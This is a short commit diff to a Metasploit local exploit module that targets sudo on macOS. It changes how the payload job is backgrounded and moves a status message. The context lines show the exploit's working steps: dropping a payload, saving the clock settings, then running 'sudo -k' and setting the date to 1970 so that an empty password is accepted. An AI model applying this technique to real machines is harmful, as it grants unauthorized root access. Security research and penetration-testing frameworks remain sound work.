Change the command to launch after background the payload job

2013-08-24 09:57:33 -05:00 · 2013-08-24 09:57:33 -05:00 · 832fa8838b
parent 4532474309
commit 832fa8838b
1 changed files with 2 additions and 7 deletions
--- a/modules/exploits/osx/local/sudo_password_bypass.rb
+++ b/modules/exploits/osx/local/sudo_password_bypass.rb
@ -113,7 +113,6 @@ class Metasploit3 < Msf::Exploit::Local
 		else
 			# "remember" the current system time/date/network/zone
 			print_good("User is an admin, continuing...")
 			print_status("Saving system clock config...")
 			# drop the payload (unless CMD)
 			if using_native_target?
@ -124,16 +123,12 @@ class Metasploit3 < Msf::Exploit::Local
 				print_status("Payload dropped and registered for cleanup")
 			end
-			print_status("Executing: #{SYSTEMSETUP_PATH} -gettime")
+			print_status("Saving system clock config...")
 			@time = cmd_exec("#{SYSTEMSETUP_PATH} -gettime").match(/^time: (.*)$/i)[1]
 			print_status("Executing: #{SYSTEMSETUP_PATH} -getdate")
 			@date = cmd_exec("#{SYSTEMSETUP_PATH} -getdate").match(/^date: (.*)$/i)[1]
 			print_status("Executing: #{SYSTEMSETUP_PATH} -getusingnetworktime")
 			@networked = cmd_exec("#{SYSTEMSETUP_PATH} -getusingnetworktime") =~ (/On$/)
 			print_status("Executing: #{SYSTEMSETUP_PATH} -gettimezone")
 			@zone = cmd_exec("#{SYSTEMSETUP_PATH} -gettimezone").match(/^time zone: (.*)$/i)[1]
 			@network_server = if @networked
 				print_status("Executing: #{SYSTEMSETUP_PATH} -getnetworktimeserver")
 				cmd_exec("#{SYSTEMSETUP_PATH} -getnetworktimeserver").match(/time server: (.*)$/i)[1]
 			end
@ -172,7 +167,7 @@ class Metasploit3 < Msf::Exploit::Local
 		end
 		## to prevent the password prompt from destroying session
-		sudo_cmd = 'echo "" | ' + sudo_cmd_raw + ' & sleep 5'
+		sudo_cmd = 'echo "" | ' + sudo_cmd_raw + ' & true'
 		print_status("Executing: sudo -k; \n"+
 			"#{SYSTEMSETUP_PATH} -setusingnetworktime Off -setdate 01:01:1970"+